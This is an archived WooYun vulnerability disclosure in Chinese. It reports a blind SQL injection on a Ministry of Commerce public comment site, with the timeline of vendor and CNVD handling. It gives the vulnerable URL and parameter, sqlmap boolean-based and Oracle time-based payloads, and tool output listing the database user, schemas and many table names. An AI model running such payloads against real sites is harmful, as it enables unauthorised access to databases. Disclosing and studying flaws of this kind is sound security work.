乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-30: 细节已通知厂商并且等待厂商处理中 2015-07-31: 厂商已经确认,细节仅向厂商公开 2015-08-10: 细节向核心白帽子及相关领域专家公开 2015-08-20: 细节向普通白帽子公开 2015-08-30: 细节向实习白帽子公开 2015-09-14: 细节向公众公开
国家商务部某分站布尔型盲注
国家商务部公众留言网SQL注入漏洞
公众留言网:http://gzly.mofcom.gov.cn/website/comment/training/index.jsp注入点:http://gzly.mofcom.gov.cn/website/comment/training/index.jsp?p_type=170Payload:
Place: GETParameter: p_type Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p_type=170' AND 2007=2007 AND 'JxUj'='JxUj Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: p_type=170' AND 4658=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'qSOy'='qSOy---[22:43:22] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
漏洞证明:
current user: 'MOFDATA'
available databases [7]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] MOFDATA[*] SYS[*] SYSTEM[*] WMSYS
[23:08:50] [INFO] retrieved: ARTICLE[23:09:34] [INFO] retrieved: ARTICLE_ATTACH[23:10:34] [INFO] retrieved: ARTICLE_CATALOG[23:11:30] [INFO] retrieved: ARTICLE_CATALOG_LOG[23:12:12] [INFO] retrieved: ARTICLE_IMAGE[23:12:57] [INFO] retrieved: ARTICLE_MEMBER_LOG[23:14:13] [INFO] retrieved: ARTICLE_TOTAL_LOG[23:15:34] [INFO] retrieved: BBS_ATTACH[23:16:38] [INFO] retrieved: BBS_CLUB[23:17:07] [INFO] retrieved: BBS_GROUP[23:17:42] [INFO] retrieved: BBS_INFO[23:18:12] [INFO] retrieved: BBS_USER[23:18:52] [INFO] retrieved: CNCFORUM_REGISTER[23:20:24] [INFO] retrieved: CODE_AREA[23:21:09] [INFO] retrieved: CODE_COUN[23:21:47] [INFO] retrieved: COI_MAIL[23:22:22] [INFO] retrieved: COMMENT_CATEGORY[23:23:50] [INFO] retrieved: COMMENT_DEP[23:24:28] [INFO] retrieved: COMMENT_EDI[23:25:07] [INFO] retrieved: COMMENT_EN_2002[23:26:01] [INFO] retrieved: COMMENT_EN_2003[23:26:24] [INFO] retrieved: COMMENT_EN_2004[23:26:57] [INFO] retrieved: COMMENT_EN_2005[23:27:20] [INFO] retrieved: COMMENT_EN_2006[23:27:50] [INFO] retrieved: COMMENT_EN_2007[23:28:13] [INFO] retrieved: COMMENT_EN_2008[23:28:43] [INFO] retrieved: COMMENT_EN_2009[23:29:13] [INFO] retrieved: COMMENT_EN_2010[23:30:01] [INFO] retrieved: COMMENT_EN_2011[23:30:27] [INFO] retrieved: COMMENT_EN_2012[23:30:59] [INFO] retrieved: COMMENT_FAQ[23:31:27] [INFO] retrieved: COMMENT_FAQ_2006[23:32:26] [INFO] retrieved: COMMENT_FAQ_2007[23:33:07] [INFO] retrieved: COMMENT_FAQ_2008[23:33:30] [INFO] retrieved: COMMENT_FAQ_2009[23:33:53] [INFO] retrieved: COMMENT_FAQ_2010[23:34:32] [INFO] retrieved: COMMENT_FAQ_2011[23:34:59] [INFO] retrieved: COMMENT_FAQ_2012[23:35:33] [INFO] retrieved: COMMENT_KEYWORD[23:36:49] [INFO] retrieved: COMMENT_KW[23:37:08] [INFO] retrieved: COMMENT_LOCAL_2004[23:38:23] [INFO] retrieved: COMMENT_LOCAL_2005[23:38:53] [INFO] retrieved: COMMENT_LOCAL_2006[23:39:24] [INFO] retrieved: COMMENT_LOCAL_2007[23:39:52] [INFO] retrieved: COMMENT_LOCAL_2007_BOXILAI
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-07-31 15:47
CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置。
暂无